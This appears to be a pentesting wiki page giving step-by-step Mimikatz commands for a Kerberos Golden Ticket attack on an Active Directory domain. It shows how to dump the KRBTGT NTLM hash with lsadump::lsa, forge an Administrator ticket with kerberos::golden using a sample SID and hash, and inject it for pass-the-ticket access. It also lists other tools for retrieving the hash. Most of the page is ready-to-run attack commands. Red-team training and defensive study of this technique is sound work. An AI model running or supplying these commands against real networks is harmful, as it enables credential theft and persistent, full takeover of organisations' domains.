githubEdit

Golden Ticket

Requirements: Domain Administrator Account or account with DCSync rights

Essential information for the attack to work:

  1. KRBTGT account NTLM hash

  2. Domain SID

Example Steps

1) Run Mimikatz

privilege::debug

2) Dump information from the KRBTGT account to construct the golden ticket (Domain SID and NTLM Hash)

lsadump::lsa /inject /name:krbtgt

3) Put it all together to create the golden ticket

kerberos::golden /User:Administrator /domain:vuln.local /sid:S-1-5-21-2356823372-3609795904-2142328116 /krbtgt:ab20acb811769e025aba7d4fef487b96 /id:500 /ptt

4) Create a separate command line session using the Golden Ticket (Pass-the-Ticket)

5) With the newly created shell, we can run the command "dir" on a workstation on the network

Alternate Method: Empire C2

Methods of KRBTGT hash retrieval

1) Mimikatz

2) Empire C2

3) Invoke-DCSync

4) Impacket Secretsdump

5) Metasploit

Last updated